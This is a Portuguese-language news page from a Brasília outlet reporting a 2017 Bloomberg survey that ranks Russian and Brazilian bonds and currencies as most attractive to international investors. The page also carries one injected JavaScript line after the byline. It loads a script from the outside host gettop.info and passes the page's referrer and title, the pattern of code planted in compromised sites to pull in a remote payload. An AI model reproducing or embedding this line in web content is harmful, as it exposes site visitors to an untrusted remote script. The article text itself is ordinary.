Ir para o conteúdo
Facebook X-twitter Instagram
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Entorno
  • Pelaí
  • Versão impressa
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Entorno
  • Pelaí
  • Versão impressa
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Entorno
  • Pelaí
  • Versão impressa
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Entorno
  • Pelaí
  • Versão impressa

Economia, Internacional

Brasil e Rússia na mira de investidores internacionais

  • Redação
  • 13/02/2017
  • 16:36

Compartilhe:

 

Vassili Krilov (*)

Os títulos e moedas nacionais da Rússia e do Brasil são os mais atraentes para os investidores internacionais, de acordo com pesquisa da agência norte-americana Bloomberg realizada com os 16 principais analistas e investidores no final de janeiro. A China ocupou a última posição do ranking.

\”Os países que demonstram um crescimento dos indicadores básicos e oferecem altos rendimentos da ‘carry trade’ [aplicação financeira que consiste em tomar dinheiro emprestado a uma taxa de juros em um país e aplicá-lo em outra moeda, onde as taxas de juros são maiores] serão mais atraentes para os investidores do aqueles que ainda não começaram o processo de redução das taxas de juros\”, disse Jens Nistedt, gestor de fundos da Morgan Stanley Investment Management.

\”Os países asiáticos, que têm os salários mais baixos e a uma alta tensão no comércio, continuam a depender do crescimento das taxas de juros em todo o mundo. Além disso, é claro que a China busca dificultar as condições monetárias e de crédito\”, disse.

Oito dos 16 especialistas entrevistados pela Bloomberg fizeram previsões otimistas em relação à moeda nacional russa, e dez esperam uma redução da taxa básica de juros pelo Banco Central russo.

 

Além disso, as obrigações brasileiras seriam as mais promissoras, na opinião de investidores dos países em desenvolvimento. O segundo e terceiro lugar do ranking de obrigações foram ocupados pela Indonésia e pela Rússia, respectivamente.

A Rússia se tornou um dos líderes da corrida de investimentos também devido a baixos riscos políticos e ao baixo impacto da política do Sistema de Reserva Federal dos EUA sobre a circulação de capitais na Rússia.

A pesquisa da Bloomberg contou com a participação de representantes da Standard Life Investments Ltd., Pioneer Investment Management Ltd., SBI Securities Co., Mitsubishi UFJ Kokusai Asset Management Co., UBS Asset Management, Morgan Stanley Investment Management, Schroder Investment Management Ltd., Standard Chartered Plc, Amundi Gestão de Activos, BNP Paribas Investment Partners, Daiwa SB Investments Ltd., Mizuho Bank Ltd., AllianceBernstein LP, Invesco Advisers Inc. e da Stone Harbor Investment Partners.

(*) Jornalista da Gazeta Russa, com informações das agências RNS e Vesti.

s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;

Compartilhe essa notícia:

Picture of Redação

Redação

Colunas

Orlando Pontes

“A revolução virá da periferia, da cultura, da música”

Caroline Romeiro

OMS revê papel dos medicamentos no tratamento da obesidade

José Matos

A escada da vida

Júlio Miragaya

5 de dezembro de 1941: a virada na 2ª Guerra Mundial

Tesandro Vilela

IA generativa muda hábitos digitais na América Latina

Júlio Pontes

Cappelli lidera engajamento entre os pré-candidatos ao GDF

Últimas Notícias

120 vagas para concurso para Guarda Municipal em Valparaíso

7 de dezembro de 2025

OMS revê papel dos medicamentos no tratamento da obesidade

6 de dezembro de 2025

Concluída duplicação da BR-050 até Delta-MG

6 de dezembro de 2025

Josafá Santana lança “Animal Poético”

6 de dezembro de 2025

Newsletter

Siga-nos

Facebook X-twitter Instagram

Sobre

  • Anuncie Aqui
  • Fale Conosco
  • Politica de Privacidade
  • Versão impressa
  • Expediente
  • Anuncie Aqui
  • Fale Conosco
  • Politica de Privacidade
  • Versão impressa
  • Expediente

Blogs

  • TV BSB Notícias
  • Pelaí
  • Nutrição
  • Chico Sant’Anna
  • Espiritualidade
  • TV BSB Notícias
  • Pelaí
  • Nutrição
  • Chico Sant’Anna
  • Espiritualidade

Colunas

  • Geral
  • Política
  • Cidades
  • Brasil
  • Esporte
  • Geral
  • Política
  • Cidades
  • Brasil
  • Esporte
Facebook X-twitter Instagram
  • Política de Privacidade
  • Termos de Uso

© Copyright 2011-2025 Brasília Capital Produtora e Editora de Jornais e Revistas LTDA.